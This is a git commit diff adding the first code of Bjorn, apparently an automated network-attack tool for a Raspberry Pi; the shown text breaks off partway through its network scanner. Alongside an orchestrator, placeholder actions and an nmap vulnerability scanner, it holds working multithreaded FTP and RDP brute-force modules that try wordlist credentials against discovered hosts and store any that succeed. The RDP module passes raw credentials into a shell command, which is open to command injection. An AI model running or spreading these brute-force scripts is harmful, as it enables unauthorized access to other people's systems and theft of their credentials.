1
0
mirror of https://github.com/infinition/Bjorn.git synced 2024-11-11 22:38:39 +03:00

First Bjorn Commit !

This commit is contained in:
Fabien POLLY
2024-11-07 16:39:14 +01:00
parent 10ffdfa103
commit 5724ce6bb6
232 changed files with 12441 additions and 385 deletions

2
.gitattributes vendored Normal file
View File

@@ -0,0 +1,2 @@
*.sh text eol=lf
*.py text eol=lf

158
Bjorn.py Normal file
View File

@@ -0,0 +1,158 @@
#bjorn.py
# This script defines the main execution flow for the Bjorn application. It initializes and starts
# various components such as network scanning, display, and web server functionalities. The Bjorn
# class manages the primary operations, including initiating network scans and orchestrating tasks.
# The script handles startup delays, checks for Wi-Fi connectivity, and coordinates the execution of
# scanning and orchestrator tasks using semaphores to limit concurrent threads. It also sets up
# signal handlers to ensure a clean exit when the application is terminated.
# Functions:
# - handle_exit: handles the termination of the main and display threads.
# - handle_exit_webserver: handles the termination of the web server thread.
# - is_wifi_connected: Checks for Wi-Fi connectivity using the nmcli command.
# The script starts by loading shared data configurations, then initializes and sta
# bjorn.py
import threading
import signal
import logging
import time
import sys
import subprocess
from init_shared import shared_data
from display import Display, handle_exit_display
from comment import Commentaireia
from webapp import web_thread, handle_exit_web
from orchestrator import Orchestrator
from logger import Logger
logger = Logger(name="Bjorn.py", level=logging.DEBUG)
class Bjorn:
"""Main class for Bjorn. Manages the primary operations of the application."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.commentaire_ia = Commentaireia()
self.orchestrator_thread = None
self.orchestrator = None
def run(self):
"""Main loop for Bjorn. Waits for Wi-Fi connection and starts Orchestrator."""
# Wait for startup delay if configured in shared data
if hasattr(self.shared_data, 'startup_delay') and self.shared_data.startup_delay > 0:
logger.info(f"Waiting for startup delay: {self.shared_data.startup_delay} seconds")
time.sleep(self.shared_data.startup_delay)
# Main loop to keep Bjorn running
while not self.shared_data.should_exit:
if not self.shared_data.manual_mode:
self.check_and_start_orchestrator()
time.sleep(10) # Main loop idle waiting
def check_and_start_orchestrator(self):
"""Check Wi-Fi and start the orchestrator if connected."""
if self.is_wifi_connected():
self.wifi_connected = True
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
self.start_orchestrator()
else:
self.wifi_connected = False
logger.info("Waiting for Wi-Fi connection to start Orchestrator...")
def start_orchestrator(self):
"""Start the orchestrator thread."""
self.is_wifi_connected() # reCheck if Wi-Fi is connected before starting the orchestrator
if self.wifi_connected: # Check if Wi-Fi is connected before starting the orchestrator
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
logger.info("Starting Orchestrator thread...")
self.shared_data.orchestrator_should_exit = False
self.shared_data.manual_mode = False
self.orchestrator = Orchestrator()
self.orchestrator_thread = threading.Thread(target=self.orchestrator.run)
self.orchestrator_thread.start()
logger.info("Orchestrator thread started, automatic mode activated.")
else:
logger.info("Orchestrator thread is already running.")
else:
logger.warning("Cannot start Orchestrator: Wi-Fi is not connected.")
def stop_orchestrator(self):
"""Stop the orchestrator thread."""
self.shared_data.manual_mode = True
logger.info("Stop button pressed. Manual mode activated & Stopping Orchestrator...")
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
logger.info("Stopping Orchestrator thread...")
self.shared_data.orchestrator_should_exit = True
self.orchestrator_thread.join()
logger.info("Orchestrator thread stopped.")
self.shared_data.bjornorch_status = "IDLE"
self.shared_data.bjornstatustext2 = ""
self.shared_data.manual_mode = True
else:
logger.info("Orchestrator thread is not running.")
def is_wifi_connected(self):
"""Checks for Wi-Fi connectivity using the nmcli command."""
result = subprocess.Popen(['nmcli', '-t', '-f', 'active', 'dev', 'wifi'], stdout=subprocess.PIPE, text=True).communicate()[0]
self.wifi_connected = 'yes' in result
return self.wifi_connected
@staticmethod
def start_display():
"""Start the display thread"""
display = Display(shared_data)
display_thread = threading.Thread(target=display.run)
display_thread.start()
return display_thread
def handle_exit(sig, frame, display_thread, bjorn_thread, web_thread):
"""Handles the termination of the main, display, and web threads."""
shared_data.should_exit = True
shared_data.orchestrator_should_exit = True # Ensure orchestrator stops
shared_data.display_should_exit = True # Ensure display stops
shared_data.webapp_should_exit = True # Ensure web server stops
handle_exit_display(sig, frame, display_thread)
if display_thread.is_alive():
display_thread.join()
if bjorn_thread.is_alive():
bjorn_thread.join()
if web_thread.is_alive():
web_thread.join()
logger.info("Main loop finished. Clean exit.")
sys.exit(0) # Used sys.exit(0) instead of exit(0)
if __name__ == "__main__":
logger.info("Starting threads")
try:
logger.info("Loading shared data config...")
shared_data.load_config()
logger.info("Starting display thread...")
shared_data.display_should_exit = False # Initialize display should_exit
display_thread = Bjorn.start_display()
logger.info("Starting Bjorn thread...")
bjorn = Bjorn(shared_data)
shared_data.bjorn_instance = bjorn # Assigner l'instance de Bjorn à shared_data
bjorn_thread = threading.Thread(target=bjorn.run)
bjorn_thread.start()
if shared_data.config["websrv"]:
logger.info("Starting the web server...")
web_thread.start()
signal.signal(signal.SIGINT, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread))
signal.signal(signal.SIGTERM, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread))
except Exception as e:
logger.error(f"An exception occurred during thread start: {e}")
handle_exit_display(signal.SIGINT, None)
exit(1)

1084
README.md

File diff suppressed because it is too large Load Diff

0
__init__.py Normal file
View File

20
actions/IDLE.py Normal file
View File

@@ -0,0 +1,20 @@
#Test script to add more actions to BJORN
from rich.console import Console
from shared import SharedData
b_class = "IDLE"
b_module = "idle_action"
b_status = "idle_action"
b_port = None
b_parent = None
console = Console()
class IDLE:
def __init__(self, shared_data):
self.shared_data = shared_data

0
actions/__init__.py Normal file
View File

190
actions/ftp_connector.py Normal file
View File

@@ -0,0 +1,190 @@
import os
import pandas as pd
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from ftplib import FTP
from queue import Queue
from shared import SharedData
from logger import Logger
logger = Logger(name="ftp_connector.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_connector"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
class FTPBruteforce:
"""
This class handles the FTP brute force attack process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_connector = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""
Initiates the brute force attack on the given IP and port.
"""
return self.ftp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Executes the brute force attack and updates the shared data status.
"""
self.shared_data.bjornorch_status = "FTPBruteforce"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""
This class manages the FTP connection attempts using different usernames and passwords.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.ftpfile = shared_data.ftpfile
if not os.path.exists(self.ftpfile):
logger.info(f"File {self.ftpfile} does not exist. Creating...")
with open(self.ftpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for FTP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
def ftp_connect(self, adresse_ip, user, password):
"""
Attempts to connect to the FTP server using the provided username and password.
"""
try:
conn = FTP()
conn.connect(adresse_ip, 21)
conn.login(user, password)
conn.quit()
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ftp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords) + 1 # Include one for the anonymous attempt
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing FTP...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Saves the results of successful FTP connections to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.ftpfile, index=False, mode='a', header=not os.path.exists(self.ftpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Removes duplicate entries from the results file.
"""
df = pd.read_csv(self.ftpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.ftpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ftp_bruteforce = FTPBruteforce(shared_data)
logger.info("[bold green]Starting FTP attack...on port 21[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
ftp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(ftp_bruteforce.ftp_connector.results)}")
exit(len(ftp_bruteforce.ftp_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

34
actions/log_standalone.py Normal file
View File

@@ -0,0 +1,34 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone"
b_module = "log_standalone"
b_status = "log_standalone"
b_port = 0 # Indicate this is a standalone action
class LogStandalone:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

View File

@@ -0,0 +1,34 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone2.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone2"
b_module = "log_standalone2"
b_status = "log_standalone2"
b_port = 0 # Indicate this is a standalone action
class LogStandalone2:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

View File

@@ -0,0 +1,188 @@
# nmap_vuln_scanner.py
# This script performs vulnerability scanning using Nmap on specified IP addresses.
# It scans for vulnerabilities on various ports and saves the results and progress.
import os
import pandas as pd
import subprocess
import logging
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn
from shared import SharedData
from logger import Logger
logger = Logger(name="nmap_vuln_scanner.py", level=logging.INFO)
b_class = "NmapVulnScanner"
b_module = "nmap_vuln_scanner"
b_status = "vuln_scan"
b_port = None
b_parent = None
class NmapVulnScanner:
"""
This class handles the Nmap vulnerability scanning process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan_results = []
self.summary_file = self.shared_data.vuln_summary_file
self.create_summary_file()
logger.debug("NmapVulnScanner initialized.")
def create_summary_file(self):
"""
Creates a summary file for vulnerabilities if it does not exist.
"""
if not os.path.exists(self.summary_file):
os.makedirs(self.shared_data.vulnerabilities_dir, exist_ok=True)
df = pd.DataFrame(columns=["IP", "Hostname", "MAC Address", "Port", "Vulnerabilities"])
df.to_csv(self.summary_file, index=False)
def update_summary_file(self, ip, hostname, mac, port, vulnerabilities):
"""
Updates the summary file with the scan results.
"""
try:
# Read existing data
df = pd.read_csv(self.summary_file)
# Create new data entry
new_data = pd.DataFrame([{"IP": ip, "Hostname": hostname, "MAC Address": mac, "Port": port, "Vulnerabilities": vulnerabilities}])
# Append new data
df = pd.concat([df, new_data], ignore_index=True)
# Remove duplicates based on IP and MAC Address, keeping the last occurrence
df.drop_duplicates(subset=["IP", "MAC Address"], keep='last', inplace=True)
# Save the updated data back to the summary file
df.to_csv(self.summary_file, index=False)
except Exception as e:
logger.error(f"Error updating summary file: {e}")
def scan_vulnerabilities(self, ip, hostname, mac, ports):
combined_result = ""
success = True # Initialize to True, will become False if an error occurs
try:
self.shared_data.bjornstatustext2 = ip
# Proceed with scanning if ports are not already scanned
logger.info(f"Scanning {ip} on ports {','.join(ports)} for vulnerabilities with aggressivity {self.shared_data.nmap_scan_aggressivity}")
result = subprocess.run(
["nmap", self.shared_data.nmap_scan_aggressivity, "-sV", "--script", "vulners.nse", "-p", ",".join(ports), ip],
capture_output=True, text=True
)
combined_result += result.stdout
vulnerabilities = self.parse_vulnerabilities(result.stdout)
self.update_summary_file(ip, hostname, mac, ",".join(ports), vulnerabilities)
except Exception as e:
logger.error(f"Error scanning {ip}: {e}")
success = False # Mark as failed if an error occurs
return combined_result if success else None
def execute(self, ip, row, status_key):
"""
Executes the vulnerability scan for a given IP and row data.
"""
self.shared_data.bjornorch_status = "NmapVulnScanner"
ports = row["Ports"].split(";")
scan_result = self.scan_vulnerabilities(ip, row["Hostnames"], row["MAC Address"], ports)
if scan_result is not None:
self.scan_results.append((ip, row["Hostnames"], row["MAC Address"]))
self.save_results(row["MAC Address"], ip, scan_result)
return 'success'
else:
return 'success' # considering failed as success as we just need to scan vulnerabilities once
# return 'failed'
def parse_vulnerabilities(self, scan_result):
"""
Parses the Nmap scan result to extract vulnerabilities.
"""
vulnerabilities = set()
capture = False
for line in scan_result.splitlines():
if "VULNERABLE" in line or "CVE-" in line or "*EXPLOIT*" in line:
capture = True
if capture:
if line.strip() and not line.startswith('|_'):
vulnerabilities.add(line.strip())
else:
capture = False
return "; ".join(vulnerabilities)
def save_results(self, mac_address, ip, scan_result):
"""
Saves the detailed scan results to a file.
"""
try:
sanitized_mac_address = mac_address.replace(":", "")
result_dir = self.shared_data.vulnerabilities_dir
os.makedirs(result_dir, exist_ok=True)
result_file = os.path.join(result_dir, f"{sanitized_mac_address}_{ip}_vuln_scan.txt")
# Open the file in write mode to clear its contents if it exists, then close it
if os.path.exists(result_file):
open(result_file, 'w').close()
# Write the new scan result to the file
with open(result_file, 'w') as file:
file.write(scan_result)
logger.info(f"Results saved to {result_file}")
except Exception as e:
logger.error(f"Error saving scan results for {ip}: {e}")
def save_summary(self):
"""
Saves a summary of all scanned vulnerabilities to a final summary file.
"""
try:
final_summary_file = os.path.join(self.shared_data.vulnerabilities_dir, "final_vulnerability_summary.csv")
df = pd.read_csv(self.summary_file)
summary_data = df.groupby(["IP", "Hostname", "MAC Address"])["Vulnerabilities"].apply(lambda x: "; ".join(set("; ".join(x).split("; ")))).reset_index()
summary_data.to_csv(final_summary_file, index=False)
logger.info(f"Summary saved to {final_summary_file}")
except Exception as e:
logger.error(f"Error saving summary: {e}")
if __name__ == "__main__":
shared_data = SharedData()
try:
nmap_vuln_scanner = NmapVulnScanner(shared_data)
logger.info("Starting vulnerability scans...")
# Load the netkbfile and get the IPs to scan
ips_to_scan = shared_data.read_data() # Use your existing method to read the data
# Execute the scan on each IP with concurrency
with Progress(
TextColumn("[progress.description]{task.description}"),
BarColumn(),
"[progress.percentage]{task.percentage:>3.1f}%",
console=Console()
) as progress:
task = progress.add_task("Scanning vulnerabilities...", total=len(ips_to_scan))
futures = []
with ThreadPoolExecutor(max_workers=2) as executor: # Adjust the number of workers for RPi Zero
for row in ips_to_scan:
if row["Alive"] == '1': # Check if the host is alive
ip = row["IPs"]
futures.append(executor.submit(nmap_vuln_scanner.execute, ip, row, b_status))
for future in as_completed(futures):
progress.update(task, advance=1)
nmap_vuln_scanner.save_summary()
logger.info(f"Total scans performed: {len(nmap_vuln_scanner.scan_results)}")
exit(len(nmap_vuln_scanner.scan_results))
except Exception as e:
logger.error(f"Error: {e}")

198
actions/rdp_connector.py Normal file
View File

@@ -0,0 +1,198 @@
"""
rdp_connector.py - This script performs a brute force attack on RDP services (port 3389) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import subprocess
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="rdp_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "RDPBruteforce"
b_module = "rdp_connector"
b_status = "brute_force_rdp"
b_port = 3389
b_parent = None
class RDPBruteforce:
"""
Class to handle the RDP brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.rdp_connector = RDPConnector(shared_data)
logger.info("RDPConnector initialized.")
def bruteforce_rdp(self, ip, port):
"""
Run the RDP brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_rdp on {ip}:{port}...")
return self.rdp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing RDPBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "RDPBruteforce"
success, results = self.bruteforce_rdp(ip, port)
return 'success' if success else 'failed'
class RDPConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.rdpfile = shared_data.rdpfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.rdpfile):
logger.info(f"File {self.rdpfile} does not exist. Creating...")
with open(self.rdpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for RDP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
def rdp_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an RDP service using the given credentials.
"""
command = f"xfreerdp /v:{adresse_ip} /u:{user} /p:{password} /cert:ignore +auth-only"
try:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
return True
else:
return False
except subprocess.SubprocessError as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.rdp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing RDP...", total=total_tasks)
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.rdpfile, index=False, mode='a', header=not os.path.exists(self.rdpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.rdpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.rdpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
rdp_bruteforce = RDPBruteforce(shared_data)
logger.info("Démarrage de l'attaque RDP... sur le port 3389")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing RDPBruteforce on {ip}...")
rdp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(rdp_bruteforce.rdp_connector.results)}")
exit(len(rdp_bruteforce.rdp_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

589
actions/scanning.py Normal file
View File

@@ -0,0 +1,589 @@
#scanning.py
# This script performs a network scan to identify live hosts, their MAC addresses, and open ports.
# The results are saved to CSV files and displayed using Rich for enhanced visualization.
import os
import threading
import csv
import pandas as pd
import socket
import netifaces
import time
import glob
import logging
from datetime import datetime
from rich.console import Console
from rich.table import Table
from rich.text import Text
from rich.progress import Progress
from getmac import get_mac_address as gma
from shared import SharedData
from logger import Logger
import ipaddress
import nmap
logger = Logger(name="scanning.py", level=logging.DEBUG)
b_class = "NetworkScanner"
b_module = "scanning"
b_status = "network_scanner"
b_port = None
b_parent = None
b_priority = 1
class NetworkScanner:
"""
This class handles the entire network scanning process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.logger = logger
self.displaying_csv = shared_data.displaying_csv
self.blacklistcheck = shared_data.blacklistcheck
self.mac_scan_blacklist = shared_data.mac_scan_blacklist
self.ip_scan_blacklist = shared_data.ip_scan_blacklist
self.console = Console()
self.lock = threading.Lock()
self.currentdir = shared_data.currentdir
self.semaphore = threading.Semaphore(200) # Limit the number of active threads to 20
self.nm = nmap.PortScanner() # Initialize nmap.PortScanner()
self.running = False
def check_if_csv_scan_file_exists(self, csv_scan_file, csv_result_file, netkbfile):
"""
Checks and prepares the necessary CSV files for the scan.
"""
with self.lock:
try:
if not os.path.exists(os.path.dirname(csv_scan_file)):
os.makedirs(os.path.dirname(csv_scan_file))
if not os.path.exists(os.path.dirname(netkbfile)):
os.makedirs(os.path.dirname(netkbfile))
if os.path.exists(csv_scan_file):
os.remove(csv_scan_file)
if os.path.exists(csv_result_file):
os.remove(csv_result_file)
if not os.path.exists(netkbfile):
with open(netkbfile, 'w', newline='') as file:
writer = csv.writer(file)
writer.writerow(['MAC Address', 'IPs', 'Hostnames', 'Alive', 'Ports'])
except Exception as e:
self.logger.error(f"Error in check_if_csv_scan_file_exists: {e}")
def get_current_timestamp(self):
"""
Returns the current timestamp in a specific format.
"""
return datetime.now().strftime("%Y%m%d_%H%M%S")
def ip_key(self, ip):
"""
Converts an IP address to a tuple of integers for sorting.
"""
if ip == "STANDALONE":
return (0, 0, 0, 0)
try:
return tuple(map(int, ip.split('.')))
except ValueError as e:
self.logger.error(f"Error in ip_key: {e}")
return (0, 0, 0, 0)
def sort_and_write_csv(self, csv_scan_file):
"""
Sorts the CSV file based on IP addresses and writes the sorted content back to the file.
"""
with self.lock:
try:
with open(csv_scan_file, 'r') as file:
lines = file.readlines()
sorted_lines = [lines[0]] + sorted(lines[1:], key=lambda x: self.ip_key(x.split(',')[0]))
with open(csv_scan_file, 'w') as file:
file.writelines(sorted_lines)
except Exception as e:
self.logger.error(f"Error in sort_and_write_csv: {e}")
class GetIpFromCsv:
"""
Helper class to retrieve IP addresses, hostnames, and MAC addresses from a CSV file.
"""
def __init__(self, outer_instance, csv_scan_file):
self.outer_instance = outer_instance
self.csv_scan_file = csv_scan_file
self.ip_list = []
self.hostname_list = []
self.mac_list = []
self.get_ip_from_csv()
def get_ip_from_csv(self):
"""
Reads IP addresses, hostnames, and MAC addresses from the CSV file.
"""
with self.outer_instance.lock:
try:
with open(self.csv_scan_file, 'r') as csv_scan_file:
csv_reader = csv.reader(csv_scan_file)
next(csv_reader)
for row in csv_reader:
if row[0] == "STANDALONE" or row[1] == "STANDALONE" or row[2] == "STANDALONE":
continue
if not self.outer_instance.blacklistcheck or (row[2] not in self.outer_instance.mac_scan_blacklist and row[0] not in self.outer_instance.ip_scan_blacklist):
self.ip_list.append(row[0])
self.hostname_list.append(row[1])
self.mac_list.append(row[2])
except Exception as e:
self.outer_instance.logger.error(f"Error in get_ip_from_csv: {e}")
def update_netkb(self, netkbfile, netkb_data, alive_macs):
"""
Updates the net knowledge base (netkb) file with the scan results.
"""
with self.lock:
try:
netkb_entries = {}
existing_action_columns = []
# Read existing CSV file
if os.path.exists(netkbfile):
with open(netkbfile, 'r') as file:
reader = csv.DictReader(file)
existing_headers = reader.fieldnames
existing_action_columns = [header for header in existing_headers if header not in ["MAC Address", "IPs", "Hostnames", "Alive", "Ports"]]
for row in reader:
mac = row["MAC Address"]
ips = row["IPs"].split(';')
hostnames = row["Hostnames"].split(';')
alive = row["Alive"]
ports = row["Ports"].split(';')
netkb_entries[mac] = {
'IPs': set(ips) if ips[0] else set(),
'Hostnames': set(hostnames) if hostnames[0] else set(),
'Alive': alive,
'Ports': set(ports) if ports[0] else set()
}
for action in existing_action_columns:
netkb_entries[mac][action] = row.get(action, "")
ip_to_mac = {} # Dictionary to track IP to MAC associations
for data in netkb_data:
mac, ip, hostname, ports = data
if not mac or mac == "STANDALONE" or ip == "STANDALONE" or hostname == "STANDALONE":
continue
# Check if MAC address is "00:00:00:00:00:00"
if mac == "00:00:00:00:00:00":
continue
if self.blacklistcheck and (mac in self.mac_scan_blacklist or ip in self.ip_scan_blacklist):
continue
# Check if IP is already associated with a different MAC
if ip in ip_to_mac and ip_to_mac[ip] != mac:
# Mark the old MAC as not alive
old_mac = ip_to_mac[ip]
if old_mac in netkb_entries:
netkb_entries[old_mac]['Alive'] = '0'
# Update or create entry for the new MAC
ip_to_mac[ip] = mac
if mac in netkb_entries:
netkb_entries[mac]['IPs'].add(ip)
netkb_entries[mac]['Hostnames'].add(hostname)
netkb_entries[mac]['Alive'] = '1'
netkb_entries[mac]['Ports'].update(map(str, ports))
else:
netkb_entries[mac] = {
'IPs': {ip},
'Hostnames': {hostname},
'Alive': '1',
'Ports': set(map(str, ports))
}
for action in existing_action_columns:
netkb_entries[mac][action] = ""
# Update all existing entries to mark missing hosts as not alive
for mac in netkb_entries:
if mac not in alive_macs:
netkb_entries[mac]['Alive'] = '0'
# Remove entries with multiple IP addresses for a single MAC address
netkb_entries = {mac: data for mac, data in netkb_entries.items() if len(data['IPs']) == 1}
sorted_netkb_entries = sorted(netkb_entries.items(), key=lambda x: self.ip_key(sorted(x[1]['IPs'])[0]))
with open(netkbfile, 'w', newline='') as file:
writer = csv.writer(file)
writer.writerow(existing_headers) # Use existing headers
for mac, data in sorted_netkb_entries:
row = [
mac,
';'.join(sorted(data['IPs'], key=self.ip_key)),
';'.join(sorted(data['Hostnames'])),
data['Alive'],
';'.join(sorted(data['Ports'], key=int))
]
row.extend(data.get(action, "") for action in existing_action_columns)
writer.writerow(row)
except Exception as e:
self.logger.error(f"Error in update_netkb: {e}")
def display_csv(self, file_path):
"""
Displays the contents of the specified CSV file using Rich for enhanced visualization.
"""
with self.lock:
try:
table = Table(title=f"Contents of {file_path}", show_lines=True)
with open(file_path, 'r') as file:
reader = csv.reader(file)
headers = next(reader)
for header in headers:
table.add_column(header, style="cyan", no_wrap=True)
for row in reader:
